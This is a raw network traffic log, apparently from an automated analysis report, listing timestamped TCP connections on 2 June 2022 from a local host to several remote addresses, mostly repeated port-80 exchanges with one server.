                                                                              Jun 2, 2022 01:54:50.857693911 CEST4986180192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:50.878863096 CEST4986180192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:50.971761942 CEST804986180.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:51.018074989 CEST4986280192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:51.107271910 CEST804986280.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:51.107397079 CEST4986280192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:51.108371973 CEST4986280192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:51.239093065 CEST804986280.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:51.285150051 CEST804986280.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:51.285538912 CEST4986280192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:51.285685062 CEST4986280192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:51.374665976 CEST804986280.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:51.402420044 CEST4986380192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:51.494251966 CEST804986380.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:51.494359016 CEST4986380192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:51.496356964 CEST4986380192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:51.628011942 CEST804986380.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:51.677273989 CEST804986380.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:51.677473068 CEST4986380192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:51.702559948 CEST4986380192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:51.794176102 CEST804986380.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:51.807447910 CEST4986480192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:51.901474953 CEST804986480.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:51.903726101 CEST4986480192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:51.906730890 CEST4986480192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:52.042679071 CEST804986480.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:52.089390993 CEST804986480.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:52.090966940 CEST4986480192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:52.092869043 CEST4986480192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:52.186553955 CEST804986480.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:52.217603922 CEST4986580192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:52.313117981 CEST804986580.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:52.313199043 CEST4986580192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:52.313960075 CEST4986580192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:52.459084988 CEST804986580.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:52.496850967 CEST804986580.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:52.496975899 CEST4986580192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:52.497498035 CEST4986580192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:52.592854023 CEST804986580.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:52.603684902 CEST4986680192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:52.698736906 CEST804986680.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:52.698919058 CEST4986680192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:52.699549913 CEST4986680192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:52.836518049 CEST804986680.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:52.885080099 CEST804986680.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:52.886255980 CEST4986680192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:52.887094975 CEST4986680192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:52.982105970 CEST804986680.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:52.995240927 CEST4986780192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:53.090055943 CEST804986780.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:53.090236902 CEST4986780192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:53.090904951 CEST4986780192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:53.227531910 CEST804986780.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:53.272829056 CEST804986780.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:53.273291111 CEST4986780192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:53.297472954 CEST4986780192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:53.391854048 CEST804986780.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:53.427382946 CEST4986880192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:53.519378901 CEST804986880.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:53.521745920 CEST4986880192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:53.522171021 CEST4986880192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:53.656927109 CEST804986880.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:53.703908920 CEST804986880.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:53.704423904 CEST4986880192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:53.704632998 CEST4986880192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:53.796545029 CEST804986880.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:53.851017952 CEST4986980192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:53.946465015 CEST804986980.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:53.949171066 CEST4986980192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:54.121448994 CEST4986980192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:54.256243944 CEST804986980.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:54.304692030 CEST804986980.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:54.304888964 CEST4986980192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:54.319788933 CEST4986980192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:54.414189100 CEST804986980.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:54.498038054 CEST4987080192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:54.592784882 CEST804987080.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:54.593043089 CEST4987080192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:54.611012936 CEST4987080192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:54.747459888 CEST804987080.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:54.795658112 CEST804987080.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:54.795907974 CEST4987080192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:54.825033903 CEST4987080192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:54.919663906 CEST804987080.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:55.074342012 CEST4987180192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:55.165051937 CEST804987180.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:55.165169001 CEST4987180192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:55.173382044 CEST4987180192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:55.307255983 CEST804987180.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:55.354124069 CEST804987180.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:55.354315996 CEST4987180192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:55.373776913 CEST4987180192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:55.464685917 CEST804987180.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:55.486721992 CEST4987280192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:55.581382036 CEST804987280.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:55.581532955 CEST4987280192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:55.595479965 CEST4987280192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:55.731992006 CEST804987280.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:55.778655052 CEST804987280.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:55.778798103 CEST4987280192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:55.812968969 CEST4987280192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:55.907650948 CEST804987280.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:55.940516949 CEST4987380192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:56.032308102 CEST804987380.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:56.032593012 CEST4987380192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:56.035907030 CEST4987380192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:56.168467999 CEST804987380.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:56.215048075 CEST804987380.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:56.215392113 CEST4987380192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:56.250322104 CEST4987380192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:56.342231035 CEST804987380.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:56.374165058 CEST4987480192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:56.467518091 CEST804987480.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:56.467680931 CEST4987480192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:56.482566118 CEST4987480192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:56.618453026 CEST804987480.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:56.665231943 CEST804987480.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:56.668523073 CEST4987480192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:56.687139034 CEST4987480192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:56.778776884 CEST804987480.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:56.794406891 CEST4987580192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:56.887125969 CEST804987580.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:56.887267113 CEST4987580192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:56.892898083 CEST4987580192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:57.027019024 CEST804987580.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:57.073848009 CEST804987580.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:57.073947906 CEST4987580192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:57.074260950 CEST4987580192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:57.166591883 CEST804987580.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:57.183700085 CEST4987680192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:57.278712988 CEST804987680.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:57.278846979 CEST4987680192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:57.279397011 CEST4987680192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:57.415858030 CEST804987680.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:57.464597940 CEST804987680.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:57.467181921 CEST4987680192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:57.467235088 CEST4987680192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:57.562074900 CEST804987680.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:57.704397917 CEST4987880192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:57.796782970 CEST804987880.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:57.797924995 CEST4987880192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:57.842865944 CEST4987880192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:57.976630926 CEST804987880.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:58.024713993 CEST804987880.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:58.028263092 CEST4987880192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:58.028352976 CEST4987880192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:58.120829105 CEST804987880.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:58.140268087 CEST4988080192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:58.233858109 CEST804988080.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:58.233943939 CEST4988080192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:58.245913982 CEST4988080192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:58.383517981 CEST804988080.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:58.427521944 CEST804988080.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:58.427642107 CEST4988080192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:58.427781105 CEST4988080192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:58.521158934 CEST804988080.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:58.546355963 CEST4988180192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:58.639693022 CEST804988180.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:58.639801979 CEST4988180192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:58.640327930 CEST4988180192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:58.775319099 CEST804988180.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:58.824417114 CEST804988180.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:58.824518919 CEST4988180192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:58.826831102 CEST4988180192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:58.919954062 CEST804988180.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:58.938725948 CEST4988480192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:59.033291101 CEST804988480.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:59.033382893 CEST4988480192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:59.033834934 CEST4988480192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:59.171322107 CEST804988480.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:59.216670990 CEST804988480.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:59.216733932 CEST4988480192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:59.216989994 CEST4988480192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:59.311461926 CEST804988480.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:59.321372032 CEST4988580192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:59.416668892 CEST804988580.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:59.416783094 CEST4988580192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:59.420912981 CEST4988580192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:59.560101986 CEST804988580.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:59.605551004 CEST804988580.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:59.605669022 CEST4988580192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:59.606144905 CEST4988580192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:59.701344967 CEST804988580.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:59.712646008 CEST4988680192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:59.807493925 CEST804988680.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:59.807796001 CEST4988680192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:59.808424950 CEST4988680192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:59.947263002 CEST804988680.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:59.993267059 CEST804988680.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:59.993518114 CEST4988680192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:59.993565083 CEST4988680192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:00.088498116 CEST804988680.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:00.112493992 CEST4988780192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:00.206674099 CEST804988780.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:00.206760883 CEST4988780192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:00.209739923 CEST4988780192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:00.346616983 CEST804988780.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:00.393475056 CEST804988780.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:00.393558025 CEST4988780192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:00.393727064 CEST4988780192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:00.487783909 CEST804988780.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:00.514714956 CEST4988880192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:00.607805014 CEST804988880.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:00.607961893 CEST4988880192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:00.609327078 CEST4988880192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:00.743736982 CEST804988880.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:00.790986061 CEST804988880.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:00.791079044 CEST4988880192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:00.791306973 CEST4988880192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:00.882894039 CEST804988880.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:00.899749994 CEST4988980192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:00.995012999 CEST804988980.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:00.995212078 CEST4988980192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:00.995563984 CEST4988980192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:01.131606102 CEST804988980.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:01.179130077 CEST804988980.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:01.179277897 CEST4988980192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:01.180227041 CEST4988980192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:01.276881933 CEST804988980.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:01.319020033 CEST4989080192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:01.413604975 CEST804989080.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:01.414870024 CEST4989080192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:01.415532112 CEST4989080192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:01.552344084 CEST804989080.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:01.599328041 CEST804989080.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:01.599455118 CEST4989080192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:01.599589109 CEST4989080192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:01.694688082 CEST804989080.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:01.724864960 CEST4989180192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:01.817056894 CEST804989180.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:01.820475101 CEST4989180192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:01.891788006 CEST4989180192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:02.027864933 CEST804989180.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:02.072062969 CEST804989180.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:02.072201967 CEST4989180192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:02.130047083 CEST4989180192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:02.224234104 CEST804989180.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:02.284980059 CEST4989280192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:02.310398102 CEST49893443192.168.2.4149.154.167.99
                                                                              Jun 2, 2022 01:55:02.310455084 CEST44349893149.154.167.99192.168.2.4
                                                                              Jun 2, 2022 01:55:02.310600042 CEST49893443192.168.2.4149.154.167.99
                                                                              Jun 2, 2022 01:55:02.342753887 CEST49893443192.168.2.4149.154.167.99
                                                                              Jun 2, 2022 01:55:02.342781067 CEST44349893149.154.167.99192.168.2.4
                                                                              Jun 2, 2022 01:55:02.376682997 CEST804989280.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:02.376807928 CEST4989280192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:02.407883883 CEST4989280192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:02.416419983 CEST44349893149.154.167.99192.168.2.4
                                                                              Jun 2, 2022 01:55:02.416534901 CEST49893443192.168.2.4149.154.167.99
                                                                              Jun 2, 2022 01:55:02.539156914 CEST804989280.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:02.590540886 CEST804989280.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:02.590653896 CEST4989280192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:02.633277893 CEST4989280192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:02.726674080 CEST804989280.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:02.754435062 CEST4989480192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:02.847913980 CEST804989480.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:02.850601912 CEST4989480192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:03.266530037 CEST4989480192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:03.403371096 CEST804989480.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:03.449297905 CEST804989480.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:03.450558901 CEST4989480192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:03.477231026 CEST4989480192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:03.570662022 CEST804989480.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:03.598601103 CEST4989580192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:03.632204056 CEST49893443192.168.2.4149.154.167.99
                                                                              Jun 2, 2022 01:55:03.632263899 CEST44349893149.154.167.99192.168.2.4
                                                                              Jun 2, 2022 01:55:03.632829905 CEST44349893149.154.167.99192.168.2.4
                                                                              Jun 2, 2022 01:55:03.632922888 CEST49893443192.168.2.4149.154.167.99
                                                                              Jun 2, 2022 01:55:03.688808918 CEST804989580.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:03.689060926 CEST4989580192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:03.702492952 CEST49893443192.168.2.4149.154.167.99
                                                                              Jun 2, 2022 01:55:03.704176903 CEST4989580192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:03.739864111 CEST44349893149.154.167.99192.168.2.4
                                                                              Jun 2, 2022 01:55:03.739917040 CEST44349893149.154.167.99192.168.2.4
                                                                              Jun 2, 2022 01:55:03.739969015 CEST49893443192.168.2.4149.154.167.99
                                                                              Jun 2, 2022 01:55:03.739994049 CEST44349893149.154.167.99192.168.2.4
                                                                              Jun 2, 2022 01:55:03.740025043 CEST44349893149.154.167.99192.168.2.4
                                                                              Jun 2, 2022 01:55:03.740034103 CEST49893443192.168.2.4149.154.167.99
                                                                              Jun 2, 2022 01:55:03.740040064 CEST44349893149.154.167.99192.168.2.4
                                                                              Jun 2, 2022 01:55:03.740235090 CEST49893443192.168.2.4149.154.167.99
                                                                              Jun 2, 2022 01:55:03.748065948 CEST49893443192.168.2.4149.154.167.99
                                                                              Jun 2, 2022 01:55:03.748100996 CEST44349893149.154.167.99192.168.2.4
                                                                              Jun 2, 2022 01:55:03.834963083 CEST804989580.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:03.884037971 CEST804989580.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:03.884258032 CEST4989580192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:03.895140886 CEST4989580192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:03.985790968 CEST804989580.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:04.958583117 CEST4989680192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:05.052187920 CEST804989680.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:05.052320957 CEST4989680192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:05.115551949 CEST4989680192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:05.141103983 CEST4989780192.168.2.494.130.174.62
                                                                              Jun 2, 2022 01:55:05.251717091 CEST804989680.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:05.297106981 CEST804989680.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:05.297207117 CEST4989680192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:05.299242020 CEST4989680192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:05.392749071 CEST804989680.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:05.433993101 CEST4989880192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:05.525218010 CEST804989880.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:05.525336981 CEST4989880192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:05.537739992 CEST4989880192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:05.671281099 CEST804989880.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:05.718848944 CEST804989880.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:05.718947887 CEST4989880192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:05.719063044 CEST4989880192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:05.810106993 CEST804989880.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:05.838085890 CEST4989980192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:05.934851885 CEST804989980.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:05.934946060 CEST4989980192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:05.935549974 CEST4989980192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:06.072439909 CEST804989980.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:06.119924068 CEST804989980.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:06.120021105 CEST4989980192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:06.120182037 CEST4989980192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:06.216079950 CEST804989980.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:06.229208946 CEST4990080192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:06.322573900 CEST804990080.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:06.322793007 CEST4990080192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:06.323240042 CEST4990080192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:06.456548929 CEST804990080.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:06.505719900 CEST804990080.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:06.505906105 CEST4990080192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:06.506939888 CEST4990080192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:06.599906921 CEST804990080.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:06.625838995 CEST4990180192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:06.718684912 CEST804990180.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:06.718812943 CEST4990180192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:06.719831944 CEST4990180192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:06.855012894 CEST804990180.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:06.901846886 CEST804990180.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:06.902077913 CEST4990180192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:06.903423071 CEST4990180192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:06.996089935 CEST804990180.66.64.103192.168.2.4
